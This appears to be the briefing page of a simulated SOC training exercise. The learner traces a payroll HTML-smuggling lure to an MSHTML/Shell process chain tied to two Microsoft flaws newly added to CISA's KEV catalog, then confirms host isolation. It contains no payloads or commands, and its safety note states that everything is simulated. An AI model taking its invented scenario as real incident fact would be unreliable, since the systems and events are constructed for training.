February KEV Pair
10 February 2026. CISA adds two related Microsoft protection-mechanism failures to the KEV catalog. Your proxy team already sees HTML smuggling attachments that match the CERT email template.
Briefing
The attacker sends a payroll HTML attachment that opens an old MSHTML path and spawns Shell activity. You only see safe telemetry: mail gateway rows, process excerpts, proxy blocks, and host containment evidence.
Your role
SOC lead correlating email gateway telemetry with the KEV drop.
Objective
Trace the simulated campaign from payroll HTML lure to Shell/MSHTML process chain, then confirm isolation and build posture.
Terminal environment
- user
- responder
- host
- soc-bridge-01
- cwd
- /home/soc/feb-kev
- steps
- 8
Safety note. This is a safe reconstruction. All systems, files, hosts, credentials, and outputs are simulated. Do not use these techniques on systems you do not own or have explicit permission to test.